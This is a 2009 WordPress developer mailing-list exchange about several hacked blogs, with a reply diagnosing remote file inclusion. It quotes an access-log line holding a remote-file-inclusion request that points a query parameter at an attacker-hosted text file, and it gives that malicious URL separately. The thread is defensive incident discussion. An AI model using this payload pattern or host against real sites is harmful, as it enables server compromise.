[wp-hackers] Hacked blogs

Dinh Ba Thanh bathanh at gmail.com
Thu Mar 26 13:09:04 GMT 2009


This is clearly remote file inclusion..

Best Regards,
Dinh Ba Thanh, Jason
bathanh at gmail.com




On Mar 26, 2009, at 9:06 PM, Joost de Valk wrote:

> Peter van der Does wrote:
>> On Thu, 26 Mar 2009 13:12:44 +0100
>> Joost de Valk<joost at yoast.com>  wrote:
>>
>>
>>> Hey guys,
>>>
>>> I've been restoring 5 hacked blogs the last few days, all running
>>> 2.7.1 but spread over different hosts, can't find the hole yet that
>>> they're getting in through, but I'd thought I'd send out a warning  
>>> to
>>> all of you that something seems to be wrong...
>>>
>>> Best,
>>> Joost
>>>
>>>
>> Do you have more info about the similarities of the blogs, like  
>> themes
>> and plugins?
>> Maybe even PHP, Webserver and MySQL versions?
>>
>>
> No similarities there, PHP4 and 5, MySQL 4 and 5, Apache 2.0.54, 2.2  
> etc....
>
> Files like this:
>
> http://oursoultvxq.com/bbs/data/vip/id.txt
>
> Show up in the access logs in some cases though:
>
> 84.40.23.30 - - [22/Mar/2009:18:04:33 +0100] "GET /boek/?op=http://oursoultvxq.com/bbs/data/vip/id.txt? 
> ??? HTTP/1.1" 200 23128 "-" "libwww-perl/5.79"
>
> Best,
> Joost
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers



More information about the wp-hackers mailing list